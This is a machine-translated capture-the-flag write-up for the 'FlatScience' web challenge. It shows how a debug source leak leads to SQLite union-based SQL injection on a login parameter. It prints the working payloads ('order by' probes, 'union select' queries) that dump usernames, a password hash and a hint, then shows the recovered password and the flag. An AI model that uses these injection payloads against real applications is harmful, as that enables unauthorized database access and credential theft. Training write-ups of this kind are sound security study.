当前位置：网站首页>[attack and defense world web] difficulty four-star 12 point advanced question: flatscience

[attack and defense world web] difficulty four-star 12 point advanced question: flatscience

2022-07-23 21:01:00 【Black zone (rise)】

Two 、FlatScience

How to solve the problem ：
1、 Understand the source code , Database Injection , encryption

The process ：
I prefer to watch it first robots.txt file
/admin.php Interface
/login.php Interface
Ctrl+U Open source
Found out ?debug
Found new source code
Start the code audit
Discovery database is SQLite3（ And MySQL There is a difference ,sqlite_master Relevant information is stored in the table ）
type/name/tbl_name/rootpage/sql It records the information when the user creates the table
And the annotation is --
Also found the input usr Injection of being
There's no filtering , It can be spliced into the database for execution
Use bp Intercept , And inject
（ stay bp In the injection ）
Determine the number of fields
1' order by 3 --
（ Report errors ）
1' order by 2 --
（ Echo normal ）
So the number of fields is 2
Judge echo
1' union select 1,2 --
The echo bit is the second

check sql Fields in the table
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
After decoding
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
Field has ：id name password hint
Construct query name
payload：
1' union select id, name from Users--
admin
Construct query password
payload：
1' union select id, password from Users--
3fab54a50e770d830c0416df817567662a9dc85c
Construct query hint
payload：
1' union select id, hint from Users--
my+fav+word+in+my+fav+paper%3F%21
After decoding
my+fav+word+in+my+fav+paper?!
We get the first data in the table
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c（MD5 Is message digest encryption , It may not work out ）
hint=my+fav+word+in+my+fav+paper?!（ It's in his paper ）

Decrypted for
ThinJerboaSalz!
That word is Salz
ThinJerboaSalz! subtract Salz
So the password is ThinJerboa
stay /admin.php Page to login
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}